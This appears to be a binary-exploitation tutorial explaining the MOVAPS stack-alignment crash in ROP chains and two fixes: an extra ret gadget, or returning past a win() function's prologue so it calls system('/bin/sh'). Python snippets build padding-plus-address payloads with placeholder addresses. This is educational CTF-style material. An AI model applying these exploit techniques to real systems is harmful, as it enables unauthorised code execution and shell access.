The Infamous MOVAPS issue

If you are writing a ROP chain and your program crashes on a movaps instruction, chances are that you are facing a stack alignment issue. This is also a common reason for exploits "working locally but not remotely".

Analyzing a MOVAPS crash

Let's first look at what a typical crash brought about by MOVAPS looks like in GDB.

[Figure: movaps issue illustrated in GDB]

The program crashes with a segmentation fault upon hitting the movaps instruction. The relevant register value and the faulting instruction are:

*RSP  0x7fffa09ee928 ◂— 0x0
...
<_int_malloc+2832>    movaps xmmword ptr [rsp + 0x10], xmm1

The movaps documentation states:

When the source or destination operand is a memory operand, the operand must be aligned on a 16-byte (0x10) boundary or a general-protection exception (#GP) is generated.

This means that the memory address being referenced has to be a multiple of 0x10. In this case, however, the memory operand is 0x7fffa09ee928+0x10=0x7fffa09ee938, which ends in 0x8 and is therefore not a multiple of 0x10.
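The arithmetic above can be checked with a few lines of Python. This is only a sketch of the alignment test, using the RSP value from the crash shown earlier; the helper name misalignment is made up for illustration.

```python
def misalignment(addr: int, boundary: int = 0x10) -> int:
    """Return how many bytes addr sits past the previous aligned boundary."""
    return addr % boundary


rsp = 0x7fffa09ee928   # RSP value taken from the GDB crash
operand = rsp + 0x10   # address used by: movaps xmmword ptr [rsp + 0x10], xmm1

print(hex(operand))               # 0x7fffa09ee938
print(misalignment(operand))      # 8, so movaps raises #GP
print(misalignment(operand - 8))  # 0, shifting by 8 would make it aligned
```

A non-zero result means the operand is misaligned and movaps will fault.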

Fixing the MOVAPS issue

In order to align our stack, we simply have to increment or decrement RSP by 0x8. The x86-64 System V ABI expects RSP to be 16-byte aligned at every call instruction, and a ROP chain can easily leave it off by 8. This means that as long as we push or pop one extra value on the stack before we call the function, we should be able to align the stack. There are many ways to do this, but I will cover the two simplest ones.

Add an additional ret

Assuming that we already have a ROP chain, we can simply add a ret gadget immediately before the address of the function we want to call.

Tip

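ret is functionally the same as pop rip (which is not an instruction you can actually write): it pops 8 bytes off the stack into RIP, so each extra ret moves RSP by 8 and does nothing else.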
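As a rough sketch, the extra ret amounts to one more 8-byte entry in the payload. Every value below (OFFSET, RET_GADGET, WIN) is a hypothetical placeholder and not taken from a real binary; substitute the offset and addresses you found for your own target.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as an 8-byte little-endian word (one stack slot)."""
    return struct.pack("<Q", value)


# Hypothetical placeholders, for illustration only.
OFFSET = 40            # bytes of padding before the saved return address
RET_GADGET = 0x40101A  # address of a lone `ret` instruction
WIN = 0x401196         # address of the function we want to call

padding = b"A" * OFFSET

# Chain that returns straight into the function (may hit the movaps crash).
chain_without_ret = padding + p64(WIN)

# Same chain with one extra `ret` first: it pops one more 8-byte slot,
# so RSP is shifted by 8 by the time the function starts executing.
chain_with_ret = padding + p64(RET_GADGET) + p64(WIN)

print(len(chain_with_ret) - len(chain_without_ret))  # 8
```

If the chain without the extra ret already works, adding one would misalign the stack instead, so only one of the two variants should be needed.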

Skip the function prologue

Assume we are trying to call a function win() that looks like this:

void win() {
    system("/bin/sh");
}

The assembly for such a function will look like this:

Dump of assembler code for function win:

   // function prologue
   win+0:     endbr64
   win+4:     push   rbp
   win+5:     mov    rbp,rsp

   // load argument
   win+8:     lea    rax,[rip+0xeac]        # 0x2004
   win+15:    mov    rdi,rax

   // call system
   win+18:    call   0x1050 <system@plt>

   // function epilogue
   win+23:    nop
   win+24:    pop    rbp
   win+25:    ret

As we can see, the only part that matters to us starts at win+8, where the argument is loaded and system is called.

If we face a movaps issue, we can simply return to win+5 or win+8 directly, skipping the initial push rbp instruction.

Because the push never executes, RSP is 8 bytes higher at the call to system than it would be if we had entered at win+0, which fixes the stack alignment issue (if any).
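In payload terms, this just means changing the return target from win to win+8. The sketch below assumes a hypothetical runtime address for win and a hypothetical padding length; only the +8 offset comes from the listing above.

```python
import struct

# Hypothetical placeholders, for illustration only.
OFFSET = 40           # bytes of padding before the saved return address
WIN = 0x401196        # runtime address of win (win+0)

SKIP_PROLOGUE = 8     # win+8 in the listing: first instruction after
                      # endbr64, push rbp and mov rbp,rsp

target = WIN + SKIP_PROLOGUE

# Return directly to win+8 so that `push rbp` is never executed.
payload = b"A" * OFFSET + struct.pack("<Q", target)

print(hex(target))    # 0x40119e
```

Note that the pop rbp in the epilogue still runs, so if the chain continues after win, the 8 bytes following this entry are consumed as the new RBP rather than as a return address.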